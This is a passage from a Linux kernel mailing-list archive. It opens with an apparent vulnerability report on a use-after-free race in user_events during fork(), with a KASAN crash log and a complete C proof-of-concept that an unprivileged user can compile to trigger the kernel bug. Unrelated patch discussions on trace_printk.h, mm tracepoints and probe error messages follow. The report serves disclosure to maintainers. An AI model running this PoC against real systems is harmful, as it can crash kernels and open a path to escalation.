But the enabler itself is now protected by kfree_rcu — it remains
visible to RCU readers in user_event_mm_dup() during fork().  Those
readers access enabler->event (via user_event_enabler_dup →
user_event_get(orig->event)), which now points to freed memory:

   fork()                                       unregister
   ────────                                     ──────────
   user_event_mm_dup()
     rcu_read_lock();
     list_for_each_entry_rcu(enabler, ...)
  user_event_enabler_destroy()
  list_del_rcu(enabler)
  user_event_put(enabler->event)
                                                    → last ref!
                                                    → 
schedule_work(put_work)
                                                  kfree_rcu(enabler, rcu)
       user_event_enabler_dup(enabler, ...)     [workqueue]
         enabler->event =  delayed_destroy_user_event()
           user_event_get(orig->event);  destroy_user_event()
           ↑ UAF: orig->event was freed! kfree(user_event)

[Reproduction]

The PoC runs as an unprivileged user with access to
/sys/kernel/tracing/user_events_data.  It creates two threads sharing
the same mm:

   - fork_worker:  continuously calls fork()/waitpid(), which triggers
                   user_event_mm_dup() → RCU list walk
   - unreg_worker: continuously registers (DIAG_IOCSREG) and unregisters
                   (DIAG_IOCSUNREG) an event enabler, which calls
                   user_event_enabler_destroy()

The race window is small but reproducible within a few iterations on a
multi-CPU QEMU VM.

[Crash log — kernel 7.1.0-next-20260618, CONFIG_KASAN=y, SMP]

   BUG: KASAN: slab-use-after-free in user_event_mm_dup+0x319/0x630
   Write of size 4 at addr ffff88802c786fa8 by task poc/29997

   Call Trace:
    <TASK>
    dump_stack_lvl
    print_report
    kasan_report
    kasan_check_range
    user_event_mm_dup+0x319/0x630
    copy_process+0x650f/0x8090
    kernel_clone+0x214/0x9c0
    __do_sys_clone+0xce/0x120
    do_syscall_64
    entry_SYSCALL_64_after_hwframe
    </TASK>

   Allocated by task 29998:
    kasan_save_stack
    __kasan_kmalloc
    __kmalloc_cache_noprof
    user_event_parse_cmd+0x721/0x2aa0
    user_events_ioctl+0xcc0/0x1d00
    __x64_sys_ioctl
    do_syscall_64

   Freed by task 5014:
    kasan_save_stack
    __kasan_slab_free
    kfree+0x165/0x710
    destroy_user_event+0x375/0x4f0
    delayed_destroy_user_event+0x8d/0x110
    process_one_work
    worker_thread
    kthread

   Last potentially related work creation:
    queue_work_on
    user_event_put+0x25d/0x460
    user_events_ioctl+0x1795/0x1d00
    __x64_sys_ioctl
    do_syscall_64

   ------------[ cut here ]------------
   refcount_t: addition on 0; use-after-free.
   WARNING: lib/refcount.c:25 at refcount_warn_saturate+0xf9/0x120
   Call Trace:
    user_event_mm_dup+0x349/0x630

The refcount warning on top of the KASAN report is a strong double
confirmation: user_event_get(orig->event) is trying to increment a
refcount on memory that has already been freed and zeroed.

The PoC is attached below.  It's a single C file, compiles with:

   gcc -o poc poc.c -static -lpthread

[1] 
https://sashiko.dev/#/patchset/20260618222743.538915-1-michael.bommarito%40gmail.com
     (Sashiko AI code review — "Use-After-Free", Severity: Critical)

Thanks,
XIAO

// PoC: user_event UAF on event object via user_event_mm_dup()
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <pthread.h>
#include <sched.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <stdint.h>

/*
 * ioctl request codes issued on the user_events_data file descriptor.
 * NOTE(review): presumably these mirror the DIAG_* definitions in the
 * kernel's user_events uapi header -- confirm against the target kernel.
 */
#define DIAG_IOC_MAGIC  '*'
/* Request used by do_reg(). */
#define DIAG_IOCSREG    _IOWR(DIAG_IOC_MAGIC, 0, struct user_reg*)
/* Defined for completeness; not issued anywhere in this PoC. */
#define DIAG_IOCSDEL    _IOW(DIAG_IOC_MAGIC, 1, char*)
/* Request used by do_unreg(). */
#define DIAG_IOCSUNREG  _IOW(DIAG_IOC_MAGIC, 2, struct user_unreg*)

/*
 * Argument block passed to the DIAG_IOCSREG ioctl by do_reg().
 * The packed attribute removes all padding, so the layout is 28 bytes.
 * NOTE(review): presumably mirrors the kernel's uapi struct user_reg --
 * confirm against the target kernel.
 */
struct user_reg {
     uint32_t size;         /* do_reg() stores sizeof(struct user_reg) here */
     uint8_t  enable_bit;   /* 0 in this PoC */
     uint8_t  enable_size;  /* 4 in this PoC */
     uint16_t flags;        /* 0 in this PoC */
     uint64_t enable_addr;  /* user address (enable_page) widened to 64 bits */
     uint64_t name_args;    /* pointer to the event name, widened to 64 bits */
     uint32_t write_index;  /* never written by this PoC; stays zero */
} __attribute__((__packed__));

/*
 * Argument block passed to the DIAG_IOCSUNREG ioctl by do_unreg().
 * The packed attribute removes all padding, so the layout is 16 bytes.
 * NOTE(review): presumably mirrors the kernel's uapi struct user_unreg --
 * confirm against the target kernel.
 */
struct user_unreg {
     uint32_t size;          /* do_unreg() stores sizeof(struct user_unreg) here */
     uint8_t  disable_bit;   /* 0 in this PoC */
     uint8_t  __reserved;    /* left zero */
     uint16_t __reserved2;   /* left zero */
     uint64_t disable_addr;  /* user address (enable_page) widened to 64 bits */
} __attribute__((__packed__));

/* Polled by both worker loops; main() clears it before a round and sets it to end the round. */
static volatile int stop_flag = 0;
/* Anonymous page mapped in main(); its address is what do_reg()/do_unreg() are called with. */
static void *enable_page = NULL;
/* Event name whose address do_reg() passes in user_reg.name_args. */
static const char *event_name = "poc_uaf_test";

/*
 * Open the user_events data file write-only.
 *
 * Tries the tracefs path first and falls back to the debugfs path.
 * Returns the descriptor on success, or the (negative) result of the
 * last open() attempt when both paths fail.
 */
static int open_fd(void)
{
     static const char *const candidates[] = {
         "/sys/kernel/tracing/user_events_data",
         "/sys/kernel/debug/tracing/user_events_data",
     };
     int fd = -1;
     size_t i;

     for (i = 0; i < sizeof(candidates) / sizeof(candidates[0]); i++) {
         fd = open(candidates[i], O_WRONLY);
         if (fd >= 0)
             break;
     }
     return fd;
}

static int do_reg(int fd, void *addr)
{
     struct user_reg reg = {0};
     reg.size = sizeof(reg);
     reg.enable_bit = 0;
     reg.enable_size = 4;
     reg.flags = 0;
     reg.enable_addr = (uint64_t)(unsigned long)addr;
     reg.name_args = (uint64_t)(unsigned long)event_name;
     return ioctl(fd, DIAG_IOCSREG, &reg);
}

static int do_unreg(int fd, void *addr)
{
     struct user_unreg unreg = {0};
     unreg.size = sizeof(unreg);
     unreg.disable_bit = 0;
     unreg.disable_addr = (uint64_t)(unsigned long)addr;
     return ioctl(fd, DIAG_IOCSUNREG, &unreg);
}

/*
 * Thread body: fork and reap a child in a tight loop until stop_flag is set.
 * Each fork() is what drives the kernel through user_event_mm_dup().
 * The thread argument is unused; always returns NULL.
 */
static void *fork_worker(void *arg)
{
     cpu_set_t mask;
     int wstatus;

     /* Pin to CPU 1 (best effort: the result is not checked). */
     CPU_ZERO(&mask);
     CPU_SET(1, &mask);
     pthread_setaffinity_np(pthread_self(), sizeof(mask), &mask);

     while (!stop_flag) {
         pid_t child = fork();

         if (child < 0) {
             /* fork() failed: back off briefly and retry. */
             usleep(100);
             continue;
         }
         if (child == 0)
             _exit(0);   /* the child has nothing to do */
         waitpid(child, &wstatus, 0);
     }
     return NULL;
}

/*
 * Thread body: until stop_flag is set, make sure an enabler is registered
 * on enable_page and then unregister it through a fresh descriptor.
 * The thread argument is unused; always returns NULL.
 */
static void *unreg_worker(void *arg)
{
     cpu_set_t mask;

     /* Pin to CPU 2 (best effort: the result is not checked). */
     CPU_ZERO(&mask);
     CPU_SET(2, &mask);
     pthread_setaffinity_np(pthread_self(), sizeof(mask), &mask);

     while (!stop_flag) {
         int reg_fd;
         int unreg_fd;

         reg_fd = open_fd();
         if (reg_fd < 0)
             continue;
         /* Ensure an enabler exists: on EADDRINUSE drop the old one and re-register. */
         if (do_reg(reg_fd, enable_page) < 0) {
             if (errno == EADDRINUSE) {
                 do_unreg(reg_fd, enable_page);
                 do_reg(reg_fd, enable_page);
             }
         }
         close(reg_fd);

         /* Unregister through a second descriptor to destroy the enabler. */
         unreg_fd = open_fd();
         if (unreg_fd < 0)
             continue;
         do_unreg(unreg_fd, enable_page);
         close(unreg_fd);

         usleep(100);
     }
     return NULL;
}

int main(int argc, char **argv)
{
     pthread_t t_fork, t_unreg;
     int fd, i, iters = 30;
     if (argc > 1) iters = atoi(argv[1]);
     printf("[+] PoC: user_event UAF in user_event_mm_dup\n");
     printf("[+] Running %d iterations (3s each)\n", iters);
     enable_page = mmap(NULL, 4096, PROT_READ|PROT_WRITE,
         MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
     if (enable_page == MAP_FAILED) { perror("mmap"); return 1; }
     memset(enable_page, 0, 4096);
     fd = open_fd();
     if (fd < 0) { perror("open /sys/kernel/tracing/user_events_data"); 
return 1; }
     if (do_reg(fd, enable_page) < 0 && errno != EADDRINUSE) {
         perror("reg"); close(fd); return 1;
     }
     close(fd);
     printf("[+] Event initialized\n");
     for (i = 0; i < iters; i++) {
         printf("[+] Iter %d/%d\n", i+1, iters);
         /* Re-create enabler */
         fd = open_fd();
         if (fd >= 0) {
             if (do_reg(fd, enable_page) < 0 && errno == EADDRINUSE) {
                 do_unreg(fd, enable_page);
                 do_reg(fd, enable_page);
             }
             close(fd);
         }
         stop_flag = 0;
         pthread_create(&t_fork, NULL, fork_worker, NULL);
         pthread_create(&t_unreg, NULL, unreg_worker, NULL);
         usleep(3000000);
         stop_flag = 1;
         pthread_join(t_unreg, NULL);
         pthread_join(t_fork, NULL);
     }
     printf("[+] Done\n");
     return 0;
}


^ permalink raw reply

* Re: [PATCH 0/2] tracing: Move trace_printk.h out of kernel.h
From: Steven Rostedt @ 2026-06-22 16:51 UTC (permalink / raw)
  To: Randy Dunlap
  Cc: Peter Zijlstra, linux-kernel, linux-trace-kernel,
	Masami Hiramatsu, Mark Rutland, Mathieu Desnoyers, Andrew Morton,
	Linus Torvalds, Sebastian Andrzej Siewior, John Ogness,
	Thomas Gleixner, Julia Lawall, Yury Norov, linux-doc,
	linux-kbuild, linuxppc-dev, dri-devel, linux-stm32,
	linux-arm-kernel, linux-rdma, linux-usb, linux-ext4, linux-nfs,
	kvm, intel-gfx
In-Reply-To: <08b3c961-18bb-43d9-8d7f-8a87bcad0afa@infradead.org>

On Mon, 22 Jun 2026 09:40:45 -0700
Randy Dunlap <rdunlap@infradead.org> wrote:

> > Did you forget your C 101 class? If you use a function, you gotta
> > include the relevant header.  
> 
> Also item #1 in Documentation/process/submit-checklist.rst.

What is that? Remove all trace_printk()s before you submit?

Because that is what you should do. But now you also need to remember
to remove the include <linux/trace_printk.h> too. Or, I guess if
someone uses it a lot, they may just keep it in their files without the
trace_printk()s.

-- Steve

^ permalink raw reply

* Re: [PATCH 0/2] tracing: Move trace_printk.h out of kernel.h
From: Randy Dunlap @ 2026-06-22 16:40 UTC (permalink / raw)
  To: Peter Zijlstra, Steven Rostedt
  Cc: linux-kernel, linux-trace-kernel, Masami Hiramatsu, Mark Rutland,
	Mathieu Desnoyers, Andrew Morton, Linus Torvalds,
	Sebastian Andrzej Siewior, John Ogness, Thomas Gleixner,
	Julia Lawall, Yury Norov, linux-doc, linux-kbuild, linuxppc-dev,
	dri-devel, linux-stm32, linux-arm-kernel, linux-rdma, linux-usb,
	linux-ext4, linux-nfs, kvm, intel-gfx
In-Reply-To: <20260622083440.GX49951@noisy.programming.kicks-ass.net>



On 6/22/26 1:34 AM, Peter Zijlstra wrote:
> On Sun, Jun 21, 2026 at 05:34:30AM -0400, Steven Rostedt wrote:
>> There's been complaints about trace_printk() being defined in kernel.h as it
>> can increase the compilation time. As it is only used by some developers for
>> debugging purposes, it should not be in kernel.h causing lots of wasted CPU
>> cycles for those that do not ever care about it.
>>
>> Instead, add a CONFIG_TRACE_PRINTK_DEBUGGING option that developers that do
>> use it can set and not have to always remember to add #include <linux/trace_printk.h>
>> to the files they add trace_printk() while debugging. It also means that
>> those that do not have that config set will not have to worry about wasted
>> CPU cycles as it is only included in the CFLAGS when the option is set, and
>> it's completely ignored otherwise.
> 
> Did you forget your C 101 class? If you use a function, you gotta
> include the relevant header.

Also item #1 in Documentation/process/submit-checklist.rst.

> You don't see userspace saying: 'Hey, you know what, perhaps we should
> add stdio.h to every other header, just in case someone wants to
> printf()' either.
> 
> I really don't understand your argument. Yes, maybe someone will forget
> and then either their editor (if they have a halfway modern setup with
> LSP enabled) or their build will complain, but so what? This is all
> trivial stuff, surely we have more pressing matters to concern ourselves
> with?



-- 
~Randy


^ permalink raw reply

* Re: [PATCH v3] mm/lruvec: trace LRU add drains and drain-all requests
From: JP Kobryn @ 2026-06-22 16:38 UTC (permalink / raw)
  To: David Hildenbrand (Arm), Vlastimil Babka (SUSE), Shakeel Butt
  Cc: linux-mm, willy, usama.arif, akpm, mhocko, rostedt, mhiramat,
	mathieu.desnoyers, kasong, qi.zheng, baohua, axelrasmussen,
	yuanchu, weixugc, chrisl, shikemeng, nphamcs, baoquan.he,
	youngjun.park, linux-kernel, linux-trace-kernel
In-Reply-To: <d4b55716-97c7-4e75-8500-6a1171ad7fc6@kernel.org>

On 6/18/26 5:38 AM, David Hildenbrand (Arm) wrote:
> On 6/18/26 10:30, Vlastimil Babka (SUSE) wrote:
>> On 6/18/26 10:21, David Hildenbrand (Arm) wrote:
>>> On 6/17/26 20:18, Vlastimil Babka (SUSE) wrote:
>>>>
>>>> Yeah and I don't recall ever that a change to a mm tracepoint would ever
>>>> break someone who'd complain and we'd have to revert it.
>>> Really? :)
>>>
>>> Read the context of the link I posted once more.
>>
>> Ah, I see. I've only read the single mail from Steven that referred to the
>> old powertop breakage and didn't notice the context.
>>
>> But I don't think these worries should stop us from adding easily usable
>> tracepoints.
> 
> Steve explained a way how apparently scheduler people are handling it without
> trace events.
> 
> You can always remove/modify tracepoints, but not trace events.
> 
> Anyhow, just wanted to mention it, because so far MM didn't really know about
> this implication.
> 

Thanks for pointing this out. I'll send v4 using DECLARE_TRACE() to
avoid creating a new event.


^ permalink raw reply

* Re: [PATCH v2 1/2] tracing: Move non-trace_printk prototypes into trace_controls.h
From: Yury Norov @ 2026-06-22 16:02 UTC (permalink / raw)
  To: Steven Rostedt
  Cc: Yury Norov, linux-kernel, linux-trace-kernel, Masami Hiramatsu,
	Mark Rutland, Mathieu Desnoyers, Andrew Morton, Linus Torvalds,
	Sebastian Andrzej Siewior, John Ogness, Thomas Gleixner,
	Peter Zijlstra, Julia Lawall
In-Reply-To: <20260622112127.5763f5ba@fedora>

On Mon, Jun 22, 2026 at 11:21:27AM -0400, Steven Rostedt wrote:
> On Mon, 22 Jun 2026 09:41:16 -0400
> Yury Norov <yury.norov@gmail.com> wrote:
> 
> > On Mon, Jun 22, 2026 at 09:07:40AM -0400, Steven Rostedt wrote:
> > > From: Steven Rostedt <rostedt@goodmis.org>
> > > 
> > > In order to remove the include to trace_printk.h from kernel.h the tracing
> > > control prototypes need to be separated into their own header file as they
> > > are used in other common header files like rcu.h. There's no point in
> > > removing trace_printk.h from kernel.h if it just gets added back to other
> > > common headers.
> > > 
> > > Prototypes are very cheap for the compiler and should not be an issue.
> > > 
> > > Signed-off-by: Steven Rostedt <rostedt@goodmis.org>  
> > 
> > Suggested-by: Yury Norov <yury.norov@gmail.com>
> 
> Thanks, I'll add your tag.

Thanks, but can you also comment on trace_dump/ftrace_dump?

^ permalink raw reply

* Re: [PATCH v2 2/2] tracing: Remove trace_printk.h from kernel.h
From: Yury Norov @ 2026-06-22 16:01 UTC (permalink / raw)
  To: Steven Rostedt
  Cc: linux-kernel, linux-trace-kernel, Masami Hiramatsu, Mark Rutland,
	Mathieu Desnoyers, Andrew Morton, Linus Torvalds,
	Sebastian Andrzej Siewior, John Ogness, Thomas Gleixner,
	Peter Zijlstra, Julia Lawall, Yury Norov
In-Reply-To: <20260622131029.816825024@kernel.org>

On Mon, Jun 22, 2026 at 09:07:41AM -0400, Steven Rostedt wrote:
> From: Steven Rostedt <rostedt@goodmis.org>
> 
> There have been complaints about trace_printk.h causing more build time
> for being in kernel.h. Move it out of kernel.h and place it in the headers
> and C files that use it.
> 
> Link: https://lore.kernel.org/all/CAHk-=wikCBeVFjVXiY4o-oepdbjAoir5+TcAgtL12c4u1TpZLQ@mail.gmail.com/

Link is nice, but can you explain in the commit message what those
complaints exactly are? There's enough opinions shared to make a nice
summary. I even think it's important enough to become a Documentation
rule.
 
> Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
> ---
> Changes since v1: https://patch.msgid.link/20260621093811.168514984@kernel.org
> 
> - Just remove trace_printk.h and fix up all the places that need it.
> 
>  arch/powerpc/kvm/book3s_xics.c         | 1 +
>  drivers/gpu/drm/i915/gt/intel_gtt.h    | 1 +
>  drivers/gpu/drm/i915/i915_gem.h        | 1 +
>  drivers/hwtracing/stm/dummy_stm.c      | 4 ++++
>  drivers/infiniband/hw/hfi1/trace_dbg.h | 1 +
>  drivers/usb/early/xhci-dbc.c           | 1 +
>  fs/ext4/inline.c                       | 1 +
>  include/linux/ftrace.h                 | 2 ++
>  include/linux/kernel.h                 | 1 -
>  include/linux/sunrpc/debug.h           | 1 +
>  include/linux/trace_printk.h           | 5 +++--
>  kernel/trace/ring_buffer_benchmark.c   | 1 +
>  samples/fprobe/fprobe_example.c        | 1 +
>  samples/ftrace/ftrace-direct-too.c     | 1 -
>  samples/trace_printk/trace-printk.c    | 1 +
>  15 files changed, 19 insertions(+), 4 deletions(-)
> 
> diff --git a/arch/powerpc/kvm/book3s_xics.c b/arch/powerpc/kvm/book3s_xics.c
> index 74a44fa702b0..ef5eb596a56e 100644
> --- a/arch/powerpc/kvm/book3s_xics.c
> +++ b/arch/powerpc/kvm/book3s_xics.c
> @@ -26,6 +26,7 @@
>  #if 1
>  #define XICS_DBG(fmt...) do { } while (0)
>  #else
> +#include <linux/trace_printk.h>
>  #define XICS_DBG(fmt...) trace_printk(fmt)
>  #endif
>  
> diff --git a/drivers/gpu/drm/i915/gt/intel_gtt.h b/drivers/gpu/drm/i915/gt/intel_gtt.h
> index b54ee4f25af1..f6f223090760 100644
> --- a/drivers/gpu/drm/i915/gt/intel_gtt.h
> +++ b/drivers/gpu/drm/i915/gt/intel_gtt.h
> @@ -35,6 +35,7 @@
>  #define I915_GFP_ALLOW_FAIL (GFP_KERNEL | __GFP_RETRY_MAYFAIL | __GFP_NOWARN)
>  
>  #if IS_ENABLED(CONFIG_DRM_I915_TRACE_GTT)
> +#include <linux/trace_printk.h>

So, before it was included unconditionally, now it's included conditionally. It
looks technically correct, but conceptually - I'm not sure.

I'm not a developer of this driver, but ... here we need trace_printk.h
if TRACE_GTT is enabled, in the next header TRACE_GEM needs it. To me
it sounds like the whole driver simply needs trace_printk.h.

>  #define GTT_TRACE(...) trace_printk(__VA_ARGS__)
>  #else
>  #define GTT_TRACE(...)
> diff --git a/drivers/gpu/drm/i915/i915_gem.h b/drivers/gpu/drm/i915/i915_gem.h
> index 1da8fb61c09e..f490052e8964 100644
> --- a/drivers/gpu/drm/i915/i915_gem.h
> +++ b/drivers/gpu/drm/i915/i915_gem.h
> @@ -117,6 +117,7 @@ int i915_gem_open(struct drm_i915_private *i915, struct drm_file *file);
>  
>  #if IS_ENABLED(CONFIG_DRM_I915_TRACE_GEM)
>  #include <linux/trace_controls.h>
> +#include <linux/trace_printk.h>
>  #define GEM_TRACE(...) trace_printk(__VA_ARGS__)
>  #define GEM_TRACE_ERR(...) do {						\
>  	pr_err(__VA_ARGS__);						\
> diff --git a/drivers/hwtracing/stm/dummy_stm.c b/drivers/hwtracing/stm/dummy_stm.c
> index 38528ffdc0b3..784f9af7ccba 100644
> --- a/drivers/hwtracing/stm/dummy_stm.c
> +++ b/drivers/hwtracing/stm/dummy_stm.c
> @@ -14,6 +14,10 @@
>  #include <linux/stm.h>
>  #include <uapi/linux/stm.h>
>  
> +#ifdef DEBUG
> +#include <linux/trace_printk.h>
> +#endif
> +

Same here. The cost of adding the header in a particular C file is
unmeasurable. But playing "#undef DEBUG #ifdef DEBUG" games looks
weird.

Imagine, the developer has this DEBUG enabled, then adds another
debugging trace_printk() out of the DEBUG block, compiles his patch
well, then sends to the user, who has DEBUG disabled; and now we hit
the same problem as in the config-based case.

Let's put it simple: dummy_stm just needs trace_printk.h.

>  static ssize_t notrace
>  dummy_stm_packet(struct stm_data *stm_data, unsigned int master,
>  		 unsigned int channel, unsigned int packet, unsigned int flags,
> diff --git a/drivers/infiniband/hw/hfi1/trace_dbg.h b/drivers/infiniband/hw/hfi1/trace_dbg.h
> index 58304b91380f..30df5e246586 100644
> --- a/drivers/infiniband/hw/hfi1/trace_dbg.h
> +++ b/drivers/infiniband/hw/hfi1/trace_dbg.h
> @@ -103,6 +103,7 @@ __hfi1_trace_def(IOCTL);
>   */
>  
>  #ifdef HFI1_EARLY_DBG
> +#include <linux/trace_printk.h>
>  #define hfi1_dbg_early(fmt, ...) \
>  	trace_printk(fmt, ##__VA_ARGS__)
>  #else
> diff --git a/drivers/usb/early/xhci-dbc.c b/drivers/usb/early/xhci-dbc.c
> index 41118bba9197..955c73bd601f 100644
> --- a/drivers/usb/early/xhci-dbc.c
> +++ b/drivers/usb/early/xhci-dbc.c
> @@ -30,6 +30,7 @@ static struct xdbc_state xdbc;
>  static bool early_console_keep;
>  
>  #ifdef XDBC_TRACE
> +#include <linux/trace_printk.h>
>  #define	xdbc_trace	trace_printk
>  #else
>  static inline void xdbc_trace(const char *fmt, ...) { }
> diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
> index 8045e4ff270c..0eff4a0c6a6c 100644
> --- a/fs/ext4/inline.c
> +++ b/fs/ext4/inline.c
> @@ -934,6 +934,7 @@ static int ext4_da_convert_inline_data_to_extent(struct address_space *mapping,
>  }
>  
>  #ifdef INLINE_DIR_DEBUG
> +#include <linux/trace_printk.h>
>  void ext4_show_inline_dir(struct inode *dir, struct buffer_head *bh,
>  			  void *inline_start, int inline_size)
>  {
> diff --git a/include/linux/ftrace.h b/include/linux/ftrace.h
> index 02bc5027523a..b5336a81e619 100644
> --- a/include/linux/ftrace.h
> +++ b/include/linux/ftrace.h
> @@ -8,6 +8,8 @@
>  #define _LINUX_FTRACE_H
>  
>  #include <linux/trace_recursion.h>
> +#include <linux/trace_controls.h>
> +#include <linux/trace_printk.h>
>  #include <linux/trace_clock.h>
>  #include <linux/jump_label.h>
>  #include <linux/kallsyms.h>
> diff --git a/include/linux/kernel.h b/include/linux/kernel.h
> index e5570a16cbb1..e87a40fbd152 100644
> --- a/include/linux/kernel.h
> +++ b/include/linux/kernel.h
> @@ -31,7 +31,6 @@
>  #include <linux/build_bug.h>
>  #include <linux/sprintf.h>
>  #include <linux/static_call_types.h>
> -#include <linux/trace_printk.h>
>  #include <linux/util_macros.h>
>  #include <linux/wordpart.h>
>  
> diff --git a/include/linux/sunrpc/debug.h b/include/linux/sunrpc/debug.h
> index ab61bed2f7af..7524f5d82fba 100644
> --- a/include/linux/sunrpc/debug.h
> +++ b/include/linux/sunrpc/debug.h
> @@ -29,6 +29,7 @@ extern unsigned int		nlm_debug;
>  # define ifdebug(fac)		if (unlikely(rpc_debug & RPCDBG_##fac))
>  
>  # if IS_ENABLED(CONFIG_SUNRPC_DEBUG_TRACE)
> +#  include <linux/trace_printk.h>
>  #  define __sunrpc_printk(fmt, ...)	trace_printk(fmt, ##__VA_ARGS__)
>  # else
>  #  define __sunrpc_printk(fmt, ...)	printk(KERN_DEFAULT fmt, ##__VA_ARGS__)
> diff --git a/include/linux/trace_printk.h b/include/linux/trace_printk.h
> index a488ea9e9f85..74ce4f8995c4 100644
> --- a/include/linux/trace_printk.h
> +++ b/include/linux/trace_printk.h
> @@ -1,11 +1,12 @@
>  /* SPDX-License-Identifier: GPL-2.0 */
>  #ifndef _LINUX_TRACE_PRINTK_H
>  #define _LINUX_TRACE_PRINTK_H
> +#if !defined(__ASSEMBLY__) && !defined(__GENKSYMS__) && !defined(BUILD_VDSO)
>  
> -#include <linux/compiler_attributes.h>
>  #include <linux/instruction_pointer.h>
>  #include <linux/stddef.h>
>  #include <linux/stringify.h>
> +#include <linux/stdarg.h>
>  
>  #ifdef CONFIG_TRACING
>  static inline __printf(1, 2)
> @@ -147,5 +148,5 @@ ftrace_vprintk(const char *fmt, va_list ap)
>  	return 0;
>  }
>  #endif /* CONFIG_TRACING */
> -
> +#endif /* !defined(__ASSEMBLY__) && !defined(__GENKSYMS__) && !defined(BUILD_VDSO) */
>  #endif
> diff --git a/kernel/trace/ring_buffer_benchmark.c b/kernel/trace/ring_buffer_benchmark.c
> index 593e3b59e42e..2bb25caebb75 100644
> --- a/kernel/trace/ring_buffer_benchmark.c
> +++ b/kernel/trace/ring_buffer_benchmark.c
> @@ -5,6 +5,7 @@
>   * Copyright (C) 2009 Steven Rostedt <srostedt@redhat.com>
>   */
>  #include <linux/ring_buffer.h>
> +#include <linux/trace_printk.h>
>  #include <linux/completion.h>
>  #include <linux/kthread.h>
>  #include <uapi/linux/sched/types.h>
> diff --git a/samples/fprobe/fprobe_example.c b/samples/fprobe/fprobe_example.c
> index bfe98ce826f3..de81b9b4ca7d 100644
> --- a/samples/fprobe/fprobe_example.c
> +++ b/samples/fprobe/fprobe_example.c
> @@ -12,6 +12,7 @@
>  
>  #define pr_fmt(fmt) "%s: " fmt, __func__
>  
> +#include <linux/trace_printk.h>
>  #include <linux/kernel.h>
>  #include <linux/module.h>
>  #include <linux/fprobe.h>
> diff --git a/samples/ftrace/ftrace-direct-too.c b/samples/ftrace/ftrace-direct-too.c
> index bf2411aa6fd7..159190f4103f 100644
> --- a/samples/ftrace/ftrace-direct-too.c
> +++ b/samples/ftrace/ftrace-direct-too.c
> @@ -1,6 +1,5 @@
>  // SPDX-License-Identifier: GPL-2.0-only
>  #include <linux/module.h>
> -
>  #include <linux/mm.h> /* for handle_mm_fault() */
>  #include <linux/ftrace.h>
>  #if !defined(CONFIG_ARM64) && !defined(CONFIG_PPC32)
> diff --git a/samples/trace_printk/trace-printk.c b/samples/trace_printk/trace-printk.c
> index cfc159580263..ff37aeb8523e 100644
> --- a/samples/trace_printk/trace-printk.c
> +++ b/samples/trace_printk/trace-printk.c
> @@ -1,4 +1,5 @@
>  // SPDX-License-Identifier: GPL-2.0-only
> +#include <linux/trace_printk.h>
>  #include <linux/module.h>
>  #include <linux/kthread.h>
>  #include <linux/irq_work.h>
> -- 
> 2.53.0
> 

^ permalink raw reply

* [PATCH] tracing/probes: make file offset error message probe-agnostic
From: Yudistira Putra @ 2026-06-22 16:00 UTC (permalink / raw)
  To: Steven Rostedt, Masami Hiramatsu
  Cc: Mathieu Desnoyers, linux-trace-kernel, linux-kernel,
	Yudistira Putra

The shared probe argument parser rejects file offsets for kernel probes.
This path is used outside the kprobe event parser too, but the diagnostic
currently says "with kprobe" even when emitted from another probe path.

Make the diagnostic probe-agnostic.

Signed-off-by: Yudistira Putra <pyudistira519@gmail.com>
---
 kernel/trace/trace_probe.c | 2 +-
 kernel/trace/trace_probe.h | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/kernel/trace/trace_probe.c b/kernel/trace/trace_probe.c
index fd1caa1f9723..fec0ad51cf61 100644
--- a/kernel/trace/trace_probe.c
+++ b/kernel/trace/trace_probe.c
@@ -1228,7 +1228,7 @@ parse_probe_arg(char *arg, const struct fetch_type *type,
 			code->op = FETCH_OP_IMM;
 			code->immediate = param;
 		} else if (arg[1] == '+') {
-			/* kprobes don't support file offsets */
+			/* Kernel probes do not support file offsets */
 			if (ctx->flags & TPARG_FL_KERNEL) {
 				trace_probe_log_err(ctx->offset, FILE_ON_KPROBE);
 				return -EINVAL;
diff --git a/kernel/trace/trace_probe.h b/kernel/trace/trace_probe.h
index 15758cc11fc6..6162f066c2b8 100644
--- a/kernel/trace/trace_probe.h
+++ b/kernel/trace/trace_probe.h
@@ -516,7 +516,7 @@ extern int traceprobe_define_arg_fields(struct trace_event_call *event_call,
 	C(BAD_MEM_ADDR,		"Invalid memory address"),		\
 	C(BAD_IMM,		"Invalid immediate value"),		\
 	C(IMMSTR_NO_CLOSE,	"String is not closed with '\"'"),	\
-	C(FILE_ON_KPROBE,	"File offset is not available with kprobe"), \
+	C(FILE_ON_KPROBE,	"File offset is not available for kernel probes"), \
 	C(BAD_FILE_OFFS,	"Invalid file offset value"),		\
 	C(SYM_ON_UPROBE,	"Symbol is not available with uprobe"),	\
 	C(TOO_MANY_OPS,		"Dereference is too much nested"), 	\
-- 
2.43.0


^ permalink raw reply related

* [PATCH] tracing/probes: fix typo in invalid variable error message
From: Yudistira Putra @ 2026-06-22 15:23 UTC (permalink / raw)
  To: Steven Rostedt, Masami Hiramatsu
  Cc: Mathieu Desnoyers, linux-trace-kernel, linux-kernel,
	Yudistira Putra

Fix a typo in the BAD_VAR diagnostic emitted for invalid $-variables
in probe event arguments.

Signed-off-by: Yudistira Putra <pyudistira519@gmail.com>
---
 kernel/trace/trace_probe.h | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/kernel/trace/trace_probe.h b/kernel/trace/trace_probe.h
index 15758cc11fc6..0f09f7aaf93f 100644
--- a/kernel/trace/trace_probe.h
+++ b/kernel/trace/trace_probe.h
@@ -511,7 +511,7 @@ extern int traceprobe_define_arg_fields(struct trace_event_call *event_call,
 	C(NO_RETVAL,		"This function returns 'void' type"),	\
 	C(BAD_STACK_NUM,	"Invalid stack number"),		\
 	C(BAD_ARG_NUM,		"Invalid argument number"),		\
-	C(BAD_VAR,		"Invalid $-valiable specified"),	\
+	C(BAD_VAR,		"Invalid $-variable specified"),	\
 	C(BAD_REG_NAME,		"Invalid register name"),		\
 	C(BAD_MEM_ADDR,		"Invalid memory address"),		\
 	C(BAD_IMM,		"Invalid immediate value"),		\
-- 
2.43.0


^ permalink raw reply related

* Re: [PATCH v2 0/2] tracing: Remove trace_printk.h from kernel.h
From: Steven Rostedt @ 2026-06-22 15:21 UTC (permalink / raw)
